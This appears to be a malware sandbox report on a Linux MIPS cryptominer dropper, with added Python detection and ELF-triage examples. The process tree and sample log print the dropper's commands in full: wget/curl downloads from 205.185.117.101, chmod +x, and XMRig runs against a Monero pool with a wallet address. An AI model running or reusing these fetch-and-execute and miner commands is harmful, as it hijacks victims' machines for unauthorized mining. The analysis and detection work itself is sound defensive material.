Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240729-en
  • resource tags
    arch:mips
    image:debian9-mipsbe-20240729-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    21/10/2024, 01:53

General

  • Target

    37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh

  • Size

    700B

  • MD5

    c4d089011765cf8fa828d28b6eeeac3e

  • SHA1

    43d933e706b0eefd0db2b5acba19205ebc1af2bd

  • SHA256

    37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19

  • SHA512

    3f55a27fc44062f48d0ee1c11c7b2ece0d3478e89744618d337dd2854b3b68e7e6161d0e38e21b32b4f85a1ee2d2fb523c7b94cc984fdff36ef65a9ddf45bae9

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • File and Directory Permissions Modification 1 TTPs 22 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 13 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh (PID 700, 1⤵)
    /tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
    Every process below is a direct child of PID 700 (2⤵), listed in PID order; signature hits are given in brackets.
    • PID 702  /usr/bin/wget: wget 205.185.117.101/log2 -O /dev/null
    • PID 719  /usr/bin/curl: curl -L 205.185.117.101/log2 -o /dev/null  [Reads runtime system information]
    • PID 727  /usr/bin/wget: wget 205.185.117.101/__min__ -O /.__min__
    • PID 804  /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c
    • PID 805  /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m
    • PID 809  /bin/chmod: chmod +x /.__min__  [File and Directory Permissions Modification]
    • PID 810  /bin/chmod: chmod +x /.__min__c  [File and Directory Permissions Modification]
    • PID 811  /bin/chmod: chmod +x /.__min__m  [File and Directory Permissions Modification]
    • PID 812  /usr/bin/nproc: nproc --all  [Enumerates kernel/hardware configuration]
    • PID 814  /bin/hostname: hostname
    • PID 815  /.__min__c: /.__min__c  [Executes dropped EXE]
    • PID 817  /.__min__: /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k  [Executes dropped EXE; System Network Configuration Discovery]
    • PID 819  /usr/bin/wget: wget 205.185.117.101/__min__ -O /.__min__
    • PID 820  /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c
    • PID 821  /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m
    • PID 822  /bin/chmod: chmod +x /.__min__c  [File and Directory Permissions Modification]
    • PID 823  /bin/chmod: chmod +x /.__min__m  [File and Directory Permissions Modification]
    • PID 824  /.__min__c: /.__min__c  [Executes dropped EXE]
    • PID 826  /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c
    • PID 827  /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m
    • PID 828  /bin/chmod: chmod +x /.__min__c  [File and Directory Permissions Modification]
    • PID 829  /bin/chmod: chmod +x /.__min__m  [File and Directory Permissions Modification]
    • PID 830  /.__min__c: /.__min__c  [Executes dropped EXE]
    • PID 832  /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c
    • PID 833  /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m
    • PID 834  /bin/chmod: chmod +x /.__min__c  [File and Directory Permissions Modification]
    • PID 835  /bin/chmod: chmod +x /.__min__m  [File and Directory Permissions Modification]
    • PID 836  /.__min__c: /.__min__c  [Executes dropped EXE]
    • PID 838  /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c
    • PID 839  /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m
    • PID 840  /bin/chmod: chmod +x /.__min__  [File and Directory Permissions Modification]
    • PID 841  /bin/hostname: hostname
    • PID 842  /.__min__: /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k  [Executes dropped EXE; System Network Configuration Discovery]
    • PID 844  /usr/bin/wget: wget 205.185.117.101/__min__ -O /.__min__
    • PID 845  /bin/chmod: chmod +x /.__min__c  [File and Directory Permissions Modification]
    • PID 846  /bin/chmod: chmod +x /.__min__m  [File and Directory Permissions Modification]
    • PID 847  /.__min__c: /.__min__c  [Executes dropped EXE]
    • PID 849  /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c
    • PID 850  /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m
    • PID 851  /bin/chmod: chmod +x /.__min__c  [File and Directory Permissions Modification]
    • PID 852  /bin/chmod: chmod +x /.__min__m  [File and Directory Permissions Modification]
    • PID 853  /.__min__c: /.__min__c  [Executes dropped EXE]
    • PID 855  /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c
    • PID 856  /bin/chmod: chmod +x /.__min__  [File and Directory Permissions Modification]
    • PID 857  /bin/hostname: hostname
    • PID 858  /.__min__: /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k  [Executes dropped EXE; System Network Configuration Discovery]
    • PID 860  /usr/bin/wget: wget 205.185.117.101/__min__ -O /.__min__
    • PID 861  /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m
    • PID 862  /bin/chmod: chmod +x /.__min__c  [File and Directory Permissions Modification]
    • PID 863  /bin/chmod: chmod +x /.__min__m  [File and Directory Permissions Modification]
    • PID 864  /.__min__c: /.__min__c  [Executes dropped EXE]
    • PID 866  /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c
    • PID 867  /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m
    • PID 868  /bin/chmod: chmod +x /.__min__c  [File and Directory Permissions Modification]
    • PID 869  /bin/chmod: chmod +x /.__min__m  [File and Directory Permissions Modification]
    • PID 870  /.__min__c: /.__min__c  [Executes dropped EXE]
    • PID 872  /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c
    • PID 873  /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m
    • PID 874  /bin/chmod: chmod +x /.__min__  [File and Directory Permissions Modification]
    • PID 875  /bin/hostname: hostname
    • PID 876  /.__min__: /.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k  [Executes dropped EXE; System Network Configuration Discovery]
    • PID 878  /usr/bin/wget: wget 205.185.117.101/__min__ -O /.__min__
    • PID 879  /bin/chmod: chmod +x /.__min__c  [File and Directory Permissions Modification]
    • PID 880  /bin/chmod: chmod +x /.__min__m  [File and Directory Permissions Modification]
    • PID 881  /.__min__c: /.__min__c  [Executes dropped EXE]
    • PID 883  /usr/bin/wget: wget 205.185.117.101/__min__c -O /.__min__c
    • PID 884  /usr/bin/wget: wget 205.185.117.101/__min__m -O /.__min__m
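The tree above is one dropper loop run over and over: fetch /.__min__, /.__min__c and /.__min__m from 205.185.117.101 with wget (wget and curl are both tried against the log2 URL first, output discarded, which looks like a reachability beacon), chmod +x each file, run /.__min__c, then start /.__min__ with xmrig-style pool arguments (-o gulf.moneroocean.stream:443, -u <wallet>, -p <worker>, --tls, -k) and go again. The -p value is the sandbox hostname with -0 appended, consistent with the hostname call made right before every miner start; xmrig's -p is the pool password, which pools commonly display as the worker name. The Python below is an added example, not part of the sandbox report or of the sample: it turns the three signature hits (File and Directory Permissions Modification, Executes dropped EXE, the miner command line) into checks over a constructed process log copied from the first pass of the tree. The Monero address regex is a shape check only (95 base58 characters, leading 4 or 8), not a checksum; the chain finder follows only downloads that name an output file with -O/-o and does not guess where a bare wget would have written.

```python
import re
import shlex

# Constructed sample, one "PID<TAB>command line" per line, copied from the first
# pass of the process tree in this report (not a live log).
SAMPLE_LOG = """\
700\t/tmp/37eccb4934bec80232b01302e3d80e5ab987d242a2eb67938638284b0eabae19.sh
702\twget 205.185.117.101/log2 -O /dev/null
719\tcurl -L 205.185.117.101/log2 -o /dev/null
727\twget 205.185.117.101/__min__ -O /.__min__
804\twget 205.185.117.101/__min__c -O /.__min__c
805\twget 205.185.117.101/__min__m -O /.__min__m
809\tchmod +x /.__min__
810\tchmod +x /.__min__c
811\tchmod +x /.__min__m
812\tnproc --all
814\thostname
815\t/.__min__c
817\t/.__min__ -o gulf.moneroocean.stream:443 -u 42QEBSXkhDFNqKRrS3UXDghrGVQ2jN6o28cmxep9eS5FjXLVDb4mbuKadP8UgRcUNYWD6w13ZGk65ef3zh35HDzUAMeRJxt -p debian9-mipsbe-20240729-en-0 --tls -k
"""

# Monero address shape (95 base58 chars, leading 4 or 8); no checksum verification.
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
# host[:port] plus optional path; scheme optional because the dropper omits it.
URL_RE = re.compile(r"^(?:https?://)?([A-Za-z0-9.\-]+(?::\d+)?)(/\S*)?$")
DOWNLOADERS = ("wget", "curl")
# "-o" also matches curl's output flag; a miner hit needs pool AND user, so
# downloader invocations never qualify.
MINER_FLAGS = {"-o": "pool", "--url": "pool", "-u": "user", "--user": "user",
               "-p": "worker", "--pass": "worker"}


def parse_log(text):
    """Return [(pid, argv)] in log order; shlex keeps quoted arguments intact."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            pid, cmd = line.split("\t", 1)
            rows.append((int(pid), shlex.split(cmd)))
    return rows


def _download_target(argv):
    """Destination of wget -O / curl -o, else None (a bare wget writes the URL
    basename into the cwd; that path is deliberately not guessed here)."""
    for flag in ("-O", "-o"):
        if flag in argv and argv.index(flag) + 1 < len(argv):
            return argv[argv.index(flag) + 1]
    return None


def find_drop_chains(rows):
    """Paths downloaded, then chmod'ed executable, then executed, in that order.
    Returns {path: (download_pid, chmod_pid, exec_pid)}."""
    downloaded, chmodded, chains = {}, {}, {}
    for pid, argv in rows:
        prog = argv[0].rsplit("/", 1)[-1] if argv else ""
        if prog in DOWNLOADERS:
            dest = _download_target(argv)
            if dest and dest != "/dev/null":
                downloaded.setdefault(dest, pid)
        elif prog == "chmod" and len(argv) >= 3:
            mode = argv[1]  # "+x", "u+x" or "755"; options before the mode are not handled
            adds_exec = ("x" in mode and not mode.startswith("-")) or (
                mode.isdigit() and any(int(d) & 1 for d in mode[-3:]))
            for path in argv[2:]:
                if adds_exec and path in downloaded:
                    chmodded.setdefault(path, pid)
        elif argv and argv[0] in chmodded and argv[0] not in chains:
            chains[argv[0]] = (downloaded[argv[0]], chmodded[argv[0]], pid)
    return chains


def find_download_hosts(rows):
    """Hosts contacted by wget/curl, mapped to the URL paths requested from each."""
    hosts = {}
    for _pid, argv in rows:
        if argv and argv[0].rsplit("/", 1)[-1] in DOWNLOADERS:
            for arg in argv[1:]:
                m = URL_RE.match(arg)
                if m and not arg.startswith("-") and "." in m.group(1):
                    hosts.setdefault(m.group(1), set()).add(m.group(2) or "/")
    return hosts


def find_miner_invocations(rows):
    """Processes whose argv carries an xmrig-style pool and user.
    Returns [(pid, {"pool", "user", "worker", "tls", "wallet_like"})]."""
    hits = []
    for pid, argv in rows:
        cfg, tls = {}, False
        for i, arg in enumerate(argv):
            if arg in MINER_FLAGS and i + 1 < len(argv):
                cfg[MINER_FLAGS[arg]] = argv[i + 1]
            elif arg == "--tls":
                tls = True
        if "pool" in cfg and "user" in cfg:
            cfg.update(tls=tls, wallet_like=bool(MONERO_ADDR.match(cfg["user"])))
            hits.append((pid, cfg))
    return hits


if __name__ == "__main__":
    rows = parse_log(SAMPLE_LOG)
    print("drop chains:", find_drop_chains(rows))
    print("download hosts:", find_download_hosts(rows))
    print("miner invocations:", find_miner_invocations(rows))
```

On a live host the same functions work over `ps -eo pid,args` reshaped into the PID<TAB>args form, or over auditd execve records; on this sample they report /.__min__ and /.__min__c as complete download/chmod/exec chains, /.__min__m as downloaded and chmod'ed but never run, 205.185.117.101 as the only download host, and PID 817 as a TLS miner talking to gulf.moneroocean.stream:443 with a wallet-shaped user.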

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /.__min__
    Filesize: 8.2MB
    MD5: 8f96e8b4e9d26884c776c1b42a70bae5
    SHA1: 53a4166052211abf77e1edf0d71c7a6faae12cc5
    SHA256: 5e5fd0bc5f1bd663d7ccc2695c2b56bd382df3c7fdac605eb0ce3c0d5df24dc4
    SHA512: 4709a5ee74cf3e91472b64891eaf9cd7cd8bde6059be6fd892863274c505fd3cf5f5631d66d01ab645406adb76b6123d287d97e90a6c08bf8f8a935a6624dcec

  • /.__min__
    Filesize: 4.6MB
    MD5: a9667595bdc8bbe37b6365102751fe19
    SHA1: c2f53c873c3a0ae9939595fcea6c07bfc8573ace
    SHA256: a99f1e801f9109a1381b10f2651a3a76a8c490e7ab778258521c787bcecb3689
    SHA512: 21b9db3ad2116228853454f248082af8de637fcec4594ddabb66697c9a14a0a7aeff0618e259a2008b73abd6c23c8348c327b36cd830b4a444996a6bd488a69f

  • /.__min__c
    Filesize: 1.6MB
    MD5: d3e378df1f5f920faaf9ef9e14a54f55
    SHA1: b039ff3865762819392cec53eeac7c8ee0a630c3
    SHA256: 58fa45ce3665fd665bde9589297a5a34c8df403e8732eb7bdc77d00c669fac29
    SHA512: 40ad13e858412d4d809d5eccb55c4e31ab65183f9064daea2d2b5e5bb311de4d43121337bb523ff1128cb9bd61319367de7e62f96ed2065b680f53371623d358

  • /.__min__m
    Filesize: 2.9MB
    MD5: d98aa7684a42d8197b0eb2946c6d4fab
    SHA1: a5a7cb1c92f7c9ce302caaaab7d52f70ce7564da
    SHA256: bacd68209fed7455e465c223d55af9574e23616f94e52c1c10ee7a1b8673898e
    SHA512: e2cce2d0e96546bfe233e8294d49ed020db89c2a5968e57a2d84b9cd02cf71060805d765050792d81d0a238cf22eb41a030d6364256115bba5f43cb40f99b1ee
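The sandbox tagged one dropped file as UPX packed, and the same path /.__min__ appears twice above with different sizes (8.2MB and 4.6MB), so each download is its own artifact and should be hashed and triaged separately rather than by path. The Python below is an added example, not part of the report or of the sample; it performs the static checks a responder would run on a dropped ELF before reaching for `upx -d`: read the ELF identification and e_machine to confirm a 32-bit big-endian MIPS binary (EM_MIPS = 8, which is what the debian9-mipsbe image runs), look for the stock 'UPX!' marker, and measure body entropy. The sample bytes are constructed inside the block (a real-shaped header on a fake body) and are not the files listed above; the 7.5 bits/byte entropy cut-off is an assumed threshold, not a figure from the report.

```python
import math
import random
import struct

EM_MIPS = 8  # e_machine value for MIPS, the architecture of the sandbox image


def is_elf(data):
    """Cheap gate: ELF magic present and enough bytes to read e_machine."""
    return len(data) >= 20 and data[:4] == b"\x7fELF"


def elf_header(data):
    """Decode EI_CLASS/EI_DATA and e_type/e_machine; raises ValueError on non-ELF input."""
    if not is_elf(data):
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported EI_CLASS/EI_DATA")
    endian = ">" if ei_data == 2 else "<"  # ELFDATA2MSB: header fields are big-endian
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {"bits": 32 if ei_class == 1 else 64, "big_endian": ei_data == 2,
            "type": e_type, "machine": e_machine, "is_mips": e_machine == EM_MIPS}


def shannon_entropy(data):
    """Bits per byte, 0.0 to 8.0; packed or encrypted bodies sit near the top."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def upx_indicators(data, header_skip=64, threshold=7.5):
    """Static UPX hints: the stock 'UPX!' magic (modified builds often patch it out)
    and body entropy measured past the header, so zeroed header bytes do not skew it."""
    body = data[header_skip:] if len(data) > header_skip else data
    magic = b"UPX!" in data
    entropy = round(shannon_entropy(body), 2)
    return {"upx_magic": magic, "entropy": entropy,
            "likely_packed": magic or entropy > threshold}


def make_sample(packed):
    """Constructed stand-in for a dropped MIPS32 big-endian ELF: a real-shaped
    52-byte header plus a fake body. These are NOT the files listed in Downloads."""
    ident = b"\x7fELF" + bytes([1, 2, 1, 0]) + b"\x00" * 8  # ELFCLASS32, ELFDATA2MSB, EV_CURRENT
    header = ident + struct.pack(">HH", 2, EM_MIPS) + b"\x00" * 32  # ET_EXEC, EM_MIPS, rest zeroed
    if packed:
        rng = random.Random(1)  # deterministic high-entropy body standing in for compressed code
        return header + b"UPX!" + bytes(rng.getrandbits(8) for _ in range(4096))
    return header + b"\x00" * 2048 + bytes(range(256)) * 8  # sparse, repetitive, unpacked-looking


def triage(data):
    """One-call summary to print per dropped file: header facts plus packing hints."""
    info = elf_header(data)
    info.update(upx_indicators(data))
    return info


if __name__ == "__main__":
    for label, sample in (("packed", make_sample(True)), ("plain", make_sample(False))):
        print(label, triage(sample))
```

A "modified UPX" verdict usually means the magic and version bytes were overwritten so that `upx -d` refuses the file; high entropy with no marker still says packed, and the practical route then is to run the binary in the same MIPS sandbox (or under a user-mode emulator) and dump the unpacked image from process memory, then hash that dump alongside the on-disk hashes listed above.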